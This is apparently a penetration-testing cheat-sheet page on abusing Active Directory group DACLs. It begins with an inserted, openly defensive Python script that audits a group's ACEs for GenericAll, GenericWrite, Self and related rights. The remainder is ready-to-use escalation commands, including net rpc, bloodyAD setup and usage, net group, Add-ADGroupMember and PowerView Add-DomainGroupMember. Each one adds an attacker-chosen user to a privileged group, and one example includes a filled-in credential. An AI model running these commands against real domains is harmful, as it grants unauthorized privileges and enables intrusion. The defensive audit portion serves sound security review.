PRIMARY CATEGORY → DACL ABUSE
An operator can abuse this DACL when the controlled user account has GenericAll, GenericWrite, Self, AllExtendedRights or Self-Membership over the target group.
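The defender-side counterpart of the precondition above, added here as an example that is not part of the original page: an offline check that flags the ACEs on a group's DACL carrying the rights just listed, so the holders can be reviewed before anyone else finds them. The `Ace` layout and the sample DACL are constructed assumptions; the access-mask bits and the `member` attribute schemaIDGUID are the standard Active Directory values.

```python
# Offline DACL audit; ACE shape is assumed and the sample ACEs are constructed.
from dataclasses import dataclass

# Access-mask bits from ADS_RIGHTS_ENUM (Active Directory rights).
DS_SELF = 0x00000008         # validated write (Self)
DS_WRITE_PROP = 0x00000020   # WriteProperty
CONTROL_ACCESS = 0x00000100  # extended rights
GENERIC_ALL = 0x10000000
GENERIC_WRITE = 0x40000000
# schemaIDGUID of the 'member' attribute (scope of Self-Membership).
MEMBER_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"

@dataclass
class Ace:
    trustee: str            # SID or name of the principal
    mask: int               # access mask
    object_type: str = ""   # ObjectType GUID; "" means unscoped
    allow: bool = True      # False = deny ACE

def membership_rights(ace: Ace) -> list[str]:
    """Rights in `ace` (named as on this page) that let the trustee add
    members to the group; an empty list means this ACE is harmless."""
    if not ace.allow:
        return []
    scope, found = ace.object_type.lower(), []
    if ace.mask & GENERIC_ALL:
        found.append("GenericAll")
    if ace.mask & GENERIC_WRITE:
        found.append("GenericWrite")
    if ace.mask & DS_SELF and scope == "":
        found.append("Self")             # every validated write
    elif ace.mask & DS_SELF and scope == MEMBER_GUID:
        found.append("Self-Membership")  # validated write on 'member'
    if ace.mask & CONTROL_ACCESS and scope == "":
        found.append("AllExtendedRights")
    return found

def audit_group(aces: list[Ace]) -> dict[str, list[str]]:
    """Map each trustee to the dangerous rights it holds over the group."""
    report: dict[str, list[str]] = {}
    for ace in aces:
        if rights := membership_rights(ace):
            report.setdefault(ace.trustee, []).extend(rights)
    return report

# Constructed sample DACL; userD holds only DS_READ_PROP (0x10).
SAMPLE_DACL = [Ace("userA", GENERIC_WRITE), Ace("userC", DS_SELF, MEMBER_GUID),
               Ace("Domain Admins", GENERIC_ALL), Ace("userD", 0x10)]
```

Feeding real ACEs into `audit_group` means parsing nTSecurityDescriptor (for example with `Get-Acl` on the AD: drive or an LDAP client) into `Ace` objects, which this block leaves to the caller.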
Abuse - UNIX-like
Net RPC (Samba Suite)
RPC Authentication
net rpc group addmem '<GROUP>' '<USER>' -U '<DOMAIN>/<USER>%<PASSWD>' -S '<TARGET>'
e.g.
User A leverages GenericWrite over Group A to add User B to Group A:
net rpc group addmem 'Group A' 'userB' -U 'domain.local/userA%password1234$!' -S 'dc.domain.local'
BloodyAD
LDAP Authentication
Setup
git clone https://github.com/CravateRouge/bloodyAD bloodyAD
cd !$ && python3 -m venv .venv
. !$/bin/activate && pip3 install -r requirements.txt
Usage
python3 bloodyAD.py --dc-ip '<DC_IP>' --domain '<DOMAIN>' --username '<USER>' --password '<PASSWD>' add groupMember '<GROUP>' '<USER>'
Abuse - Windows
Net Command
net group "<GROUP>" "<USER>" /add /domain
AD Powershell Module
Add-ADGroupMember -Identity '<GROUP>' -Members '<USER>'
Powerview
Add-DomainGroupMember
$pass = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'
$cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $pass)
Add-DomainGroupMember -Credential $cred -Identity '<GROUP>' -Members '<USER>' -Verbose